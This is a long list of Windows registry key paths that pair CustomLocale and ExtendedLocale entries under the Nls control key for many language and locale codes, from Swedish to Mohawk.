HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sv-SE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sv-SE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\th
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\th
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\th-TH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\th-TH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tr-TR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tr-TR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ur
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ur
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ur-PK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ur-PK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\id
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\id
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\id-ID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\id-ID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\uk
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\uk
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\uk-UA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\uk-UA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\be
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\be
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\be-BY
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\be-BY
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sl-SI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sl-SI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\et
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\et
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\et-EE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\et-EE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\lv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\lv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\lv-LV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\lv-LV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\lt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\lt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\lt-LT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\lt-LT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tg
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tg
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tg-Cyrl-TJ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tg-Cyrl-TJ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fa-IR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fa-IR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\vi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\vi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\vi-VN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\vi-VN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\hy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\hy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\hy-AM
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\hy-AM
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\az
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\az
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\az-Latn-AZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\az-Latn-AZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\eu
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\eu
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\eu-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\eu-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\hsb
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\hsb
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\hsb-DE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\hsb-DE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\mk
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\mk
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\mk-MK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\mk-MK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tn
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tn
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tn-ZA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tn-ZA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\xh
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\xh
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\xh-ZA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\xh-ZA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\zu
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\zu
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\zu-ZA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\zu-ZA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\af
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\af
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\af-ZA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\af-ZA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ka
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ka
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ka-GE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ka-GE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fo-FO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fo-FO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\hi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\hi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\hi-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\hi-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\mt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\mt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\mt-MT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\mt-MT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\se
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\se
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\se-NO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\se-NO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ga
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ga
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ga-IE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ga-IE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ms
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ms
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ms-MY
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ms-MY
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\kk
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\kk
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\kk-KZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\kk-KZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ky
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ky
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ky-KG
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ky-KG
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sw
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sw
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sw-KE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sw-KE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tk
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tk
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tk-TM
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tk-TM
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\uz
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\uz
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\uz-Latn-UZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\uz-Latn-UZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tt-RU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tt-RU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\bn
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\bn
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\bn-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\bn-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\pa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\pa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\pa-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\pa-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\gu
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\gu
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\gu-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\gu-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\or
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\or
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\or-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\or-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ta
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ta
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ta-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ta-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\te
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\te
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\te-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\te-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\kn
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\kn
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\kn-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\kn-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ml
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ml
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ml-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ml-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\as
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\as
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\as-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\as-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\mr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\mr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\mr-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\mr-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sa-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sa-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\mn
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\mn
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\mn-MN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\mn-MN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\bo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\bo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\bo-CN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\bo-CN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cy-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cy-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\km
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\km
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\km-KH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\km-KH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\lo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\lo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\lo-LA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\lo-LA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\gl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\gl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\gl-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\gl-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\kok
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\kok
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\kok-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\kok-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\syr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\syr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\syr-SY
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\syr-SY
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\si
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\si
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\si-LK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\si-LK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\iu
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\iu
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\iu-Latn-CA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\iu-Latn-CA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\am
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\am
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\am-ET
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\am-ET
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tzm
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tzm
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tzm-Latn-DZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tzm-Latn-DZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ne
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ne
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ne-NP
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ne-NP
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fy-NL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fy-NL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ps
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ps
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ps-AF
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ps-AF
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fil
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fil
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fil-PH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fil-PH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\dv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\dv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\dv-MV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\dv-MV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ha
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ha
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ha-Latn-NG
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ha-Latn-NG
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\yo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\yo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\yo-NG
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\yo-NG
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\quz
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\quz
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\quz-BO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\quz-BO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\nso
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\nso
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\nso-ZA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\nso-ZA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ba
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ba
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ba-RU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ba-RU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\lb
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\lb
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\lb-LU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\lb-LU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\kl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\kl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\kl-GL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\kl-GL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ig
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ig
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ig-NG
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ig-NG
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ii
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ii
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ii-CN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ii-CN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\arn
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\arn
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\arn-CL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\arn-CL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\moh
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\moh
